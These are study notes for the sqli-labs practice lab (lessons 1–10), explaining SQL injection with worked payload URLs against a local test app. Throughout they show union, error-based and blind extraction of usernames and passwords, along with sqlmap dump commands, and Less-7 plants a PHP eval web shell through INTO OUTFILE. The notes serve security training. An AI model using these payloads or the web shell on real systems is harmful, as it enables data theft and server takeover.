sqli-labs study notes (Less-1 to Less-10)
- Less-1 GET - Error based - Single quotes - String
- Less-2 GET - Error based - Intiger based
- Less-3 GET - Error based - Single quotes with twist string
- Less-4 GET - Error based - Double Quotes - String
- Less-5 GET - Double Injection - Single Quotes - String
- Less-6 GET - Double Injection - Double Quotes - String
- Less-7 GET - Dump into outfile - String
- Less-8 GET - Blind - Boolian Based - Single Quotes
- Less-9 Blind - Time based. - Single Quotes
- Less-10 GET - Blind - Time based - double quotes
Less-1 GET - Error based - Single quotes - String
Query shape: select ... from ... where id='$id'
Union-based injection
http://127.0.0.1/sqli-labs-master/Less-1/?id=0'
The page returns a MySQL syntax error, so the single quote breaks out of the string literal.
http://127.0.0.1/sqli-labs-master/Less-1/?id=0' order by 3--+
Column count: order by 3 renders normally and order by 4 errors, so the query selects 3 columns. The trailing --+ comments out the rest of the original statement (the + is decoded to the space MySQL requires after --).
- Dump the database name
http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,database()--+
(id=0 matches no row, so the only row the page displays is the one supplied by the union.)
- Dump the table names
http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
- Dump the column names
http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users"--+
(Add and table_schema=database() if any other database on the server also has a table called users; otherwise its columns are mixed into the result.)
- Dump the rows
http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,group_concat(username,0x3a,password) from users--+
(0x3a: the 0x prefix marks a hexadecimal literal, and 3a is 58 in decimal, the ASCII colon ':', used to separate username from password.)
Running it with sqlmap:
sqlmap -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-db
- Reports the current database
sqlmap -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security --tables
- Lists the tables
sqlmap -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns
- Lists the columns
sqlmap -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C id,password,username --dump
- Dumps the rows
Less-2 GET - Error based - Intiger based
Entering id=1' shows that the whole input, quote included, went into the query: the error message quotes it without any surrounding quote characters of its own.
Guessed query: select ... from ... where id=$id
So drop the single quote from the payloads and follow the same steps as Less-1.
Payload:
- Find the column count: an error means N is larger than the number of columns, a normal page means N is less than or equal to it
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 3--+
- Dump the database name
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,database()--+
- Dump the table names
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
- Dump the column names
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users"--+
- Dump the rows
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,group_concat(username,0x3a,password) from users--+
Less-3 GET - Error based - Single quotes with twist string
Entering id=1' shows an error message in which the quote is followed by an extra right parenthesis.
Guessed query: select ... from ... where id=('$id')
So keep the single quote but also close the parenthesis: use ') where Less-1 used ', then follow the Less-1 steps.
Payload:
- Find the column count
http://127.0.0.1/sqli-labs-master/Less-3/?id=1') order by 3 --+
(order by 3 renders, order by 4 errors: 3 columns)
- Dump the database name
http://127.0.0.1/sqli-labs-master/Less-3/?id=0') union select 1,2,database()--+
- Dump the table names
http://127.0.0.1/sqli-labs-master/Less-3/?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
- Dump the column names
http://127.0.0.1/sqli-labs-master/Less-3/?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users"--+
- Dump the rows
http://127.0.0.1/sqli-labs-master/Less-3/?id=0') union select 1,2,group_concat(username,0x3a,password) from users--+
Less-4 GET - Error based - Double Quotes - String
Entering id=1' gives no error; entering id=1" does, and the error shows an extra right parenthesis after the double quote.
Guessed query: select ... from ... where id=("$id")
So use ") where Less-1 used ', then follow the Less-1 steps.
Payload:
- Find the column count
http://127.0.0.1/sqli-labs-master/Less-4/?id=1") order by 3 --+
- Dump the database name
http://127.0.0.1/sqli-labs-master/Less-4/?id=0") union select 1,2,database()--+
- Dump the table names:
http://127.0.0.1/sqli-labs-master/Less-4/?id=0") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
- Dump the column names:
http://127.0.0.1/sqli-labs-master/Less-4/?id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users"--+
- Dump the rows:
http://127.0.0.1/sqli-labs-master/Less-4/?id=0") union select 1,2,group_concat(username,0x3a,password) from users--+
Less-5 GET - Double Injection - Single Quotes - String
Entering id=1' produces a MySQL error message, but the page never echoes query results, so the union technique from Less-1 cannot display data here.
The injection must therefore be one of boolean-based blind, error-based, or time-based blind. Build a time-based probe:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and sleep(5)--+
There is a clear delay, so time-based injection works. Build payloads:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and sleep(5) order by 3--+
Manual time-based injection: a true condition delays the response, a false one does not.
In this method the payload is ... ?id=1' and if(<condition>,sleep(5),1)--+, where <condition> is the same comparison you would put in a boolean-based payload.
- Database name length:
Payload: http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and if(length(database())=8,sleep(5),1)--+
Clear delay: the database name is 8 characters long.
- Database name:
Payload: http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and if(left(database(),1)='s',sleep(5),1)--+
Clear delay: the first character is s. Next, increase the length in left(database(),n) by one and try each candidate for the new last character on the right-hand side; a correct guess delays. This ends with left(database(),8)='security'.
- Table names:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u' ,sleep(5),1)--+
In limit 3,1 the 3 is a zero-based offset, so this selects the fourth table of the current database.
Guess one letter at a time, ending with
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' ,sleep(5),1)--+
Clear delay, so the table name is users.
- Column names:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='username' ,sleep(5),1)--+
Clear delay, so a username column exists.
Likewise for the password column:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 5,1),8)='password' ,sleep(5),1)--+
(The offsets 4 and 5 depend on whatever other databases on the server also have a table named users, because this query does not filter on table_schema. Add and table_schema=database() and the offsets are those of security.users alone: id, username, password at 0, 1, 2.)
- Rows:
Username payload: http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
Password payload: http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
Order by id so that username and password line up; note that limit offsets start at 0. After persistent guessing the first user is dumb with password dumb. Note that MySQL's default collation is case-insensitive, so 'dumb'='Dumb' compares true and you cannot tell Dumb from dumb this way; compare against a binary string (left(...)=binary 'Dumb') or compare ascii() values of single characters if case matters.
Change the limit offset to dump every row.
It is best to let sqlmap do this; it can dump the whole database directly.
Less-6 GET - Double Injection - Double Quotes - String
Double-quoted string injection: replace the single quote of the previous lesson with a double quote. The same options apply: manual time-based blind injection, manual error-based injection, or sqlmap.
Less-7 GET - Dump into outfile - String
Payload: http://127.0.0.1/sqli-labs-master/Less-7/?id=1'))--+
The page renders normally, so the guessed query is: select ... from ... where id=(('$id'))
- Find the server paths using Less-2, since Less-7 echoes no query output:
Payload:
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,@@basedir,@@datadir --+
- Then write a one-line PHP web shell:
http://127.0.0.1/sqli-labs-master/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST["hacker"]);?>' into outfile "/var/www/html/sqli-labs-master/Less-7/hacker.php"--+ (Linux with Apache)
This only works when the MySQL account has the FILE privilege, secure_file_priv is empty or permits that directory (check with select @@secure_file_priv), and the mysqld process can write into the web root; the page gives no feedback, so request hacker.php afterwards to confirm the write.
Then connect to hacker.php with Caidao (China Chopper), using hacker as the parameter name:
Less-8 GET - Blind - Boolian Based - Single Quotes
With id=1 the page shows content, with id=1' it shows nothing, and with id=1'--+ it shows content again. So whether the page renders is the oracle; proceed as in Less-5, putting the condition directly after and instead of inside if(...,sleep(5),1).
- Database name length payload:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())=8--+
- Database name payload:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select database()),8)="security"--+
Next dump the table names, column names and rows following the Less-5 method.
- Table names of security:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)="users"--+
- Column names of the users table:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select column_name from information_schema.columns where table_name="users" limit 4,1),8)="username"--+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select column_name from information_schema.columns where table_name="users" limit 5,1),8)="password"--+
- Rows:
Username payload: http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select username from users order by id limit 0,1),4)="dumb"--+
Password payload: http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select password from users order by id limit 0,1),4)="dumb"--+
Order by id and step the limit offset to dump every row.
Less-9 Blind - Time based. - Single Quotes
The lesson name says time-based blind injection. Enter id=1' and sleep(5)--+
There is a clear delay, so the query is: select ... from ... where id='$id'
Payload:
- Column count:
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(5) order by 3 --+
Clear delay; with order by 4 there is no delay because the statement fails before it runs, so there are 3 columns.
- Database name length:
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and length(database())=8 and sleep(5) --+
Put the condition before sleep(): MySQL evaluates AND from left to right and stops at the first false operand, so sleep(5) only runs when the condition holds. Written the other way round (and sleep(5) and length(database())=8) the delay happens whether or not the condition is true and tells you nothing.
Clear delay, so the length is 8.
- Database name:
This is simply trying one character at a time, which takes a long time.
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and left(database(),1)='s' and sleep(5) --+
Clear delay; add one more character
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and left(database(),2)='se' and sleep(5) --+
...
until all 8 characters are found
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and left(database(),8)='security' and sleep(5) --+
- Table names:
Same as the database name, one character at a time
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1 ),1)='u',sleep(3),1)--+
In limit x,1),y), x is the zero-based offset of the table and y the number of characters compared; try one character at a time
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(3),1)--+
This yields the table we need: users
- Column names:
Same idea
Username payload: http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='username',sleep(3),1)--+
Password payload: http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 5,1),8)='password',sleep(3),1)--+
- Rows:
username column:
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb',sleep(3),1)--+
password column:
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb',sleep(3),1)--+
Likewise, dump every row one at a time.
Less-10 GET - Blind - Time based - double quotes
Just change id=1' in the Less-9 payloads to id=1"; everything else is the same as Less-9.